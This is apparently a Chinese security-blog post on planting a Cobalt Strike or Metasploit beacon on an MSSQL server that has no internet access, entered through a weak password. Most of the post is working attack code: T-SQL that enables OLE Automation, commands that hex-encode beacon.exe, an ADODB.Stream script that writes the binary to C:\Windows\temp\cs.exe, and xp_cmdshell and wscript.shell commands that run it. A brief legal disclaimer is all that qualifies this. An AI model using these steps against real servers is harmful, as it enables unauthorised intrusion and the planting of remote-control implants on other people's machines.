MSSQL不出网文件落地上线方式

共 2221字,需浏览 5分钟

 ·

2022-06-07 19:51

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 前言

一个MSSQL非注入的场景:在内网扫描到一个MSSQL弱口令,支持xp_cmdshell,Administrator权限,但不能出网,DNS也出不了,那么我们该如何将文件落地到目标主机并执行上线呢?


0x02 利用思路

我们可以通过当前这台能出网的主机开启一个Socks代理连接不出网主机的MSSQL,然后再利用以下方式将PE文件落地到不出网的MSSQL主机,最终通过出网主机来中转上线不出网主机。


0x03 启用OLE组件

在执行命令或写入文件时都需要用到sp_oacreate,这主要是用来创建OLE对象,所以需要先执行以下SQL语句来启用“OLE Automation Procedures”组件。

exec master.dbo.sp_configure 'show advanced options', 1RECONFIGUREexec master.dbo.sp_configure 'Ole Automation Procedures', 1RECONFIGURE


0x04 EXE转换HEX

使用以下方式将生成的CS/MSF攻击载荷文件转换为HEX编码,这里我找了几个可以转换HEX编码的方法,Linux的xxd命令,python脚本,或者010editor编辑器,根据个人习惯选择吧。


(1) Linux exe -> hex

xxd -ps beacon.exe hex.txt


(2) python exe -> hex

import binasciifilename = 'beacon.exe'with open(filename, 'rb') as f:    content = f.read()print(binascii.hexlify(content))


(3) 010editor exe -> hex

利用这种方式拷贝下来的HEX也能使用certutil.exe -decodehex正常解码,但如果要用OLE组件写入时就还需要做下处理,将空格、换行都删掉,全部放在一行即可。


0x05 EXE文件落地

将我们上边转换好的HEX编码放在第一行,加上0x,然后在本地的Navicat Premium数据库管理工具中执行即可,这时可以看到cs.exe文件已经成功落地到目标主机的磁盘。


注:xp_cmdshell组件调用的是cmd.exe,所以在利用这种方式写入大文件时可能会出现字符长度限制等问题。

DECLARE @DATA VARBINARY(MAX) = 0x-hex        DECLARE @filepath VARCHAR(MAX) = 'C:\\Windows\\temp\\cs.exe'        DECLARE @ObjectToken INT        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT        EXEC sp_OASetProperty @ObjectToken, 'Type', 1        EXEC sp_OAMethod @ObjectToken, 'Open'        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2        EXEC sp_OAMethod @ObjectToken, 'Close'        EXEC sp_OADestroy @ObjectToken        SELECT @filepath


0x06 执行EXE上线

这时再利用xp_cmdshell、sp_oacreate等方式去执行刚落地的cs.exe即可上线。这里我只是根据这种场景进行了简单的模拟测试,不出网主机上线方式可参考我之前分享的。

利用MSF上线断网主机的思路分享利用goproxy http上线不出网主机利用Pystinger Socks4上线不出网主机 


xp_cmdshell:

exec master..xp_cmdshell "cmd /c C:\\Windows\\temp\\cs.exe"

sp_oacreate:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c C:\\Windows\\temp\\cs.exe'


往期精彩文章




Windows支持诊断工具(MSDT)远程代码执行漏洞(CVE-2022-30190)分析复现/修复
团队招人进行时!期待优秀的你加入
新华三magicR100存在未授权RCE攻击
MSF监听之加密流量下的后门上线


技术支持:白帽子社区团队
— 扫码关注我们 



浏览 20
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报